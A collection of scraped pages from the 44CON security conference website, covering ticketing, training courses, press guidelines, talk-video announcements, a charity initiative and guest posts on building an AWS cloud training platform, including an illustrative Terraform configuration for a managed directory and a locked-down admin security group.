  • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
  • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
  • Martin Jordan – Austerbury: Iranian cyber threat briefing

Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

#####EOF##### 44CON Training – 44CON

44CON Training

As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

2019 Schedule

June Training: 6th – 7th June 2019

We have 3 training courses available in June at two days in length. Training will take place at the Novotel London West in Hammersmith:

Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

September Training: 9th – 11th September 2019

Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

Training will take place at the Novotel London West in Hammersmith:

More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

December Training: 2nd – 6th December 2019

Our call for training is now closed. Courses will be listed in due course.

Please contact us if you’d like to deliver training in London in March 2020.

44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

#####EOF##### Attending – 44CON

Attending

Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

Press registration is handled separately to normal attendance registration. Please see here for more info.

Mark your calendars:

Next 44CON Conferences will take place:

  • 2019: 11th, 12th & 13th of September 2019
  • 2020: 9th, 10th & 11th of September 2020

In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

#####EOF##### 44CON 2019 Early Bird | Sense/Net

44CON is the UK’s largest combined annual Security Conference and Training event and brings the best and brightest security speakers locally and from around the world to the UK.

The event will start the evening of the 11th September 2019, with the Conference days on the 12th and 13th September 2019.

Early Bird Tickets have sold out. 

Standard tickets are now on sale.

Early Bird Tickets give you access to everything and include lunch on both Thursday and Friday.

 44CON 2019 Early Bird tickets are available in the following ticketing options:

  • Conference Ticket
  • Conference Ticket + exclusive design 44CON 2019 T-Shirt
  • Conference Ticket + hotel room at the IBIS
  • Conference Ticket + exclusive design 44CON 2019 T-Shirt + hotel room at the IBIS

You can choose between 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, at:

  • £115 per night for a single room
  • £125 per night for a double or twin room

    You can also book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON19-ATT at the following rates:

    • £120 per night for a single room
    • £130 per night for a double or twin room

    There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

    For more information, please visit our website 44con.com.

      Conference and training tickets are non-refundable as per our Terms of Service.

      This ticket is NOT transferable. If you want a training course as well you will need to purchase one here when they become available. This ticket will be valid only for the conference on 12th to 14th September. 

       




      Sorry, the 44CON 2019 Early Bird is not currently available.
      #####EOF##### First Videos From 44CON 2018 Up – 44CON

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

      First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

      Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

      Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

      Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

      Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

      We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

      #####EOF##### 44CON – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      Continue reading “Building an AWS and Azure security training platform”

      Hacking 44CON’s Pricing Model (5 Different Ways)

      It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

      44CON 2019 Early-Bird Tickets are now on sale

      Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

      We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

      As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

      Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

      44CON Training Goes Quarterly

      We’ve offered training courses around 44CON for a long time. We provide a mix of high-end focused courses on everything from exploiting Windows Kernel bugs to broader, more generalist courses on web application security and security monitoring. From this year onwards, we’re expanding this to a quarterly schedule.

      That’s right, you no longer have to wait a year to sit a high quality training course!

      Our 12 month schedule is available here, and you can check out our first courses scheduled for the 11th and 12th of March 2019:

      Mastering Container Security – Rory McCune, NCC Group
      Malware Reverse Engineering – Joxean Koret

      Both courses are two days long and cost £1300 inc. VAT. When you book online remember to keep the 13th of March free for access to an exclusive, invite-only event.

      If you’d like to offer a high-end course in London, get in touch.

      #####EOF##### Archive – 44CON

      Archive

      Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

      2019

      2018

      2017

      2016

      2015

      2014

      2013

      2012

      2011

      Our records, like our memories, are hazy. Some talks are up on our YouTube channel.

      A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

      #####EOF##### Mastering Container Security – 44CON

      Mastering Container Security

      Presented By: Rory McCune

      Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

      This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

      We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

      The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

      The 2 day course will take place on the 10th & 11th September 2019 in London.
      The price is £1,300 (inc VAT). Book your place in our shop now.

      Learning Objectives

      • Guidance on how to effectively use Docker to build secure and performant container images.
      • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
      • Hardening guidance for Docker Engine instances.
      • Introduction to container clustering and orchestration with Docker Swarm.
      • Secure configuration and attacks of Kubernetes clusters.
      • Techniques for effectively assessing the security of container images.

      Course Outline

      Day 1:

      • Docker Basics
      • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
      • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
      • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
      • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
      • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
      • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

      Day 2:

      • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
      • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
      • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
      • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

      Target Audience

      Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

      Student Requirements

      The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

      What to Bring

      • Working laptop where you have administrator rights

      Software Requirements

      • Linux / Windows / Mac OS X desktop operating systems
      • SSH client capable of using key based logins

      Students will be provided with

      Copies of the course including all exercises and Virtual Machine images used during the course.

      About the Trainer

      LEAD INSTRUCTOR – Rory McCune @raesene

      Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

      He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

      Book your 44CON 2019 training course now!

      #####EOF##### Media – 44CON


      #####EOF##### Building an AWS and Azure security training platform – 44CON

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

      For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? The time spent on the labs would then be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

      First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

      Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

      So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

      This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

      AWS Directory Services has several options; the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

      As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

      The design includes:
      • Virtual Private Cloud (VPC) with private address space
      • private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
      • public DMZ subnets for outbound access to the Internet using NAT Gateways
      • Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
      • Security group on the admin server only allowing inbound remote desktop access from a single IP address.

      If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.

      The next step is to set up a new AWS account for the training platform. I’ll cover that in the next blog post.

      Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.

      #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post, I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

      That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

      The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

      I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

      An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

      That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

      The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by HashiCorp, as it’s ideal for automating infrastructure as code:

      Here’s an example of the code snippet used to create the AWS Directory service:

      My Terraform code included nearly all the required resources:

      • VPC, DMZ and private subnets in multiple availability zones, subnet routes
      • Network Address Translation (NAT) gateways and Internet gateway
      • Key and key alias in AWS Key Management Service
      • Virtual machine instance for Active Directory admin, security group and Elastic IP
      • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
      • Identity and Access Management (IAM) policy and role for AD admin virtual machine
      • AWS Systems Manager templates for domain join and Windows feature setup
      • Secrets in AWS Secrets Manager for user passwords – more on this later

      The one exception is Amazon WorkSpaces, as these are not supported by Terraform at the time of writing.

      I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

      After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

      Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

      Opening Active Directory Users and Computers, I could see the AWS Directory domain.

      All I needed now were some automation scripts to create users, and then build the Amazon WorkSpaces. I’ll cover these in my next post.
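
As an added illustration of two of the resources described in these posts (this is not Paul's own Terraform code, which is not reproduced on this page), the following configuration declares the AWS managed Microsoft AD directory in the private subnets and the admin server security group that accepts remote desktop from a single address. All variable names, resource names and values are assumptions, and it uses current Terraform syntax rather than the version available when the post was written.

```hcl
# Added example: every name, variable and value below is an assumption,
# not taken from the author's code.
terraform {
  required_version = ">= 1.0"
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = ">= 4.0"
    }
  }
}

variable "vpc_id" {
  type        = string
  description = "VPC that holds the private user subnets"
}

variable "private_subnet_ids" {
  type        = list(string)
  description = "Private subnets for the domain controllers, in different availability zones"

  validation {
    condition     = length(var.private_subnet_ids) == 2
    error_message = "AWS Managed Microsoft AD needs exactly two subnets."
  }
}

variable "directory_name" {
  type        = string
  description = "Fully qualified domain name of the directory, e.g. corp.example.com"
}

variable "directory_admin_password" {
  type        = string
  sensitive   = true
  description = "Password for the directory Admin account"
}

variable "admin_cidr" {
  type        = string
  description = "The one address allowed to reach the admin server over RDP"

  # Reject ranges: the design allows a single IP address, so only a /32 passes.
  validation {
    condition     = can(regex("^[0-9]{1,3}(\\.[0-9]{1,3}){3}/32$", var.admin_cidr))
    error_message = "The admin_cidr value must be a single IPv4 address written as a /32."
  }
}

# AWS managed Active Directory, Standard Edition, placed in the private subnets.
# The password is marked sensitive but is still written to the Terraform state,
# so the state backend must be encrypted and access-controlled.
resource "aws_directory_service_directory" "training" {
  name     = var.directory_name
  password = var.directory_admin_password
  type     = "MicrosoftAD"
  edition  = "Standard"

  vpc_settings {
    vpc_id     = var.vpc_id
    subnet_ids = var.private_subnet_ids
  }
}

# Security group for the AD admin server: inbound RDP from one address only.
resource "aws_security_group" "ad_admin" {
  name        = "ad-admin-rdp"
  description = "RDP to the AD admin server from a single address"
  vpc_id      = var.vpc_id

  ingress {
    description = "Remote desktop from the administrator's address"
    from_port   = 3389
    to_port     = 3389
    protocol    = "tcp"
    cidr_blocks = [var.admin_cidr]
  }

  # Outbound is left open so the server can reach the domain controllers
  # and AWS Systems Manager; no other inbound rule is defined.
  egress {
    description = "All outbound traffic"
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

# DNS addresses of the domain controllers, needed for the domain join.
output "directory_dns_ips" {
  value = aws_directory_service_directory.training.dns_ip_addresses
}
```

Running `terraform plan` with `admin_cidr` set to a range such as `0.0.0.0/0` fails at the variable validation, before any security group is created.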

      #####EOF##### 44CON

      Hacking 44CON’s Pricing Model (5 Different Ways)

      It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

      44CON 2019 Early-Bird Tickets are now on sale

      Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

      We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

      As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

      Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

      44CONnect – A 1-day invite-only event in March 2019

      44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

      To qualify for an invite, you need to have done one of the following:

      There are 20 tickets available, so make sure you qualify!

      Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

      There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

      Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

      *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

      #####EOF##### 44CONnect – A 1-day invite-only event in March 2019 – 44CON

      #####EOF##### Press Information – 44CON

      Press Information

      This page contains information relevant to members of the press. Whether you’re thinking of covering 44CON for your personal blog or a mainstream media outlet, we’d appreciate it if you read this anyway.

      Press Office

      There is a press office at our conferences where registered members of the press can conduct interviews and access the 44CON press team. The room has sufficient space for stands, cameras and microphones to be set up but this has to be arranged in advance.

      Guidelines

      44CON conferences are events for all sorts of information security related people who come from many walks of life and have different world views. People expect a certain right to non-intrusive behaviour. While registered press are welcome, unregistered press members will be asked to leave. In order to make everyone’s experience better, the following house rules apply:

      • Press must register as press in advance
      • Your press pass must be worn at all times
      • Except for 44CON photographers, filming and photography is not permitted in the auditorium area
      • No pictures of participants may be taken without explicit permission
      • A certain number of free press tickets are available – please contact for details
      • If you are writing an article about 44CON please let us know in advance so we can link to your organisation’s web site

      If in doubt, please ask a helper as ejection from the conference often offends. For registration, queries and notification please e-mail us.

      #####EOF##### 44CON 2018 – 44CON

      Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

      Lab Materials for Advanced Wireless Attacks Workshop
      For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
      • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
      • A step-by-step lab setup guide
      • A detailed course guide to supplement the material covered in the workshop
      Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
      If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

      Making Britain a Better Place For The Most Vulnerable

      “You measure the degree of civilization of a society by how it treats its weakest members.”

      This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

      The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

      Help us raise money at 44CON

      We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a rubber-keyed Spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric-a-brac others would want to buy at £5-£50 in suggested value.

      Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

      We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

      All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

      Get involved

      We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

      Building A Permanent Community At 44CON

      44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

      To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

      In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

      Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

      For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any, concurrent users, and most content was downloaded in batches for later offline use.

      Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

      Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

      We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

      What To Expect On Thursday Night

      44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

      If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

      First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

      The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

      Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

      Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

      While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

      • Best billed idea
      • Most lame duck pitch
      • Most quackers concept

      Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

      If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

